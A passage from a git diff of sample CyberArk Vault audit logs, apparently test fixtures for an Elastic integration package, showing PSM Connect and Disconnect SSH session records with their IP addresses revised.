Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:35:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:00\n 2021-03-15T10:35:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:00","IsoTimestamp":"2021-03-15T10:35:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T13:18:31Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:31\n 2021-03-15T13:18:31Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:31","IsoTimestamp":"2021-03-15T13:18:31Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:06Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:06\n 2021-03-15T14:08:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:06","IsoTimestamp":"2021-03-15T14:08:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:28\n 2021-03-15T14:08:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:28","IsoTimestamp":"2021-03-15T14:08:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-15T14:11:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:09\n 2021-03-15T14:11:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:09","IsoTimestamp":"2021-03-15T14:11:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-16T10:04:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:51\n 2021-03-16T10:04:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:51","IsoTimestamp":"2021-03-16T10:04:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/302_psm_disconnect.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/302_psm_disconnect.log index c172f644c9f..06567eb4180 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/302_psm_disconnect.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/302_psm_disconnect.log @@ -1,16 +1,16 @@ {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\n 10.2.0.7\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"302","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2","Station":"10.2.0.7","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"admin2"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"CPMDisabled","Value":"No Reason"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"Customer","Value":"Tesla"}]}}}} -<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:47:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:47:01\n 2021-03-11T17:47:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:47:01","IsoTimestamp":"2021-03-11T17:47:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:48:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:40\n 2021-03-11T17:48:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:40","IsoTimestamp":"2021-03-11T17:48:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:55:02Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:55:02\n 2021-03-11T17:55:02Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:55:02","IsoTimestamp":"2021-03-11T17:55:02Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:56:42Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:42\n 2021-03-11T17:56:42Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:42","IsoTimestamp":"2021-03-11T17:56:42Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T20:23:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:30\n 2021-03-11T20:23:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:30","IsoTimestamp":"2021-03-11T20:23:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:49:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:54\n 2021-03-14T13:49:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:54","IsoTimestamp":"2021-03-14T13:49:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:51:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:51:35\n 2021-03-14T13:51:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:51:35","IsoTimestamp":"2021-03-14T13:51:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 